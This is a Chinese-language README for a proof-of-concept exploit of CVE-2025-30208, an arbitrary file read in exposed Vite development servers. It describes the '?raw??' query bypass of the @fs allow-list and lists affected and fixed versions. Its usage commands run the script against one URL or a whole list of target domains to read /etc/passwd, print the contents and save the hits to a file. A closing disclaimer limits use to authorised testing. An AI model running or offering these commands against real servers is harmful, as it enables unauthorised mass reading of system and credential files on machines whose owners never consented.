这是一个利用 CVE-2025-30208 漏洞的概念验证(PoC)脚本,允许在 Vite 开发服务器上读取任意文件。
Vite 是一个前端开发工具提供者,其版本在 6.2.3、6.1.2、6.0.12、5.4.15 和 4.5.10 之前存在漏洞。@fs 拒绝访问 Vite 服务允许列表之外的文件。在 URL 中添加 ?raw?? 或 ?import&raw?? 可以绕过此限制,如果文件存在则返回其内容。此绕过存在的原因是尾部分隔符(如 ?)在多个地方被移除,但在查询字符串正则表达式中未被考虑。因此任意文件的内容可以被返回给浏览器。只有明确将 Vite 开发服务器暴露到网络的应用程序(使用 --host 或 server.host 配置选项)才会受到影响。版本 6.2.3、6.1.2、6.0.12、5.4.15 和 4.5.10 修复了此问题。
requestsargparseurllib3colorama你可以通过以下命令安装依赖包:
pip install -r requirements.txt
python3 CVE-2025-30208.py http://localhost:5173 -f /etc/passwd
python3 CVE-2025-30208.py -l domains.txt -f /etc/passwd
domains.txt 应每行包含一个目标 URL。-v : 如果易受攻击则显示文件内容。-o output.txt : 将易受攻击的 URL 保存到文件。示例:
python3 CVE-2025-30208.py http://localhost:5173 -f /etc/passwd -v -o results.txt
此脚本仅用于教育和授权的安全测试目的。未经授权对不属于自己的系统使用是非法的且不道德。